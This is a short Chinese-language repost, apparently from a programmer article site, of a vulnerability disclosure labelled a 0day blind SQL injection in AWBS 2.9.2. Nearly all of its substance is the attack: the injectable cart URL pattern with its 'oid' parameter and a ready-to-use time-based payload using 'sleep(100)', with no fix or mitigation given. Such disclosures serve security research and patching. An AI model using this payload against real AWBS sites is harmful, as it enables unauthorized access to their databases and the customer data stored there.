欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

AWBS 2.9.2 Blind SQL 注入0day

程序员文章站 2022-06-28 08:57:26
AWBS 2.9.2 Blind SQL 注入0day,大家可以参考下。... 11-03-11...

  影响版本:awbs 2.9.2

  官方网站:http://www.awbs.com

  漏洞类型:sql注入

  漏洞描述:

  ---vulnerability---

  http(s)://[host]/cart?ca=add_other&oid=[true value]'[blind-sql]

  =============================================================================================

  ---poc using time-based blind sql injection---

  https://www.vulnerablehost.com/cart?ca=add_other&oid=1'%20and%20sleep(100)='

 

上一篇: 网站受到XSS跨站点脚本攻击的分析及解决方法

下一篇: 不怕忘密码 巧破NTFS下Win2000口令

推荐阅读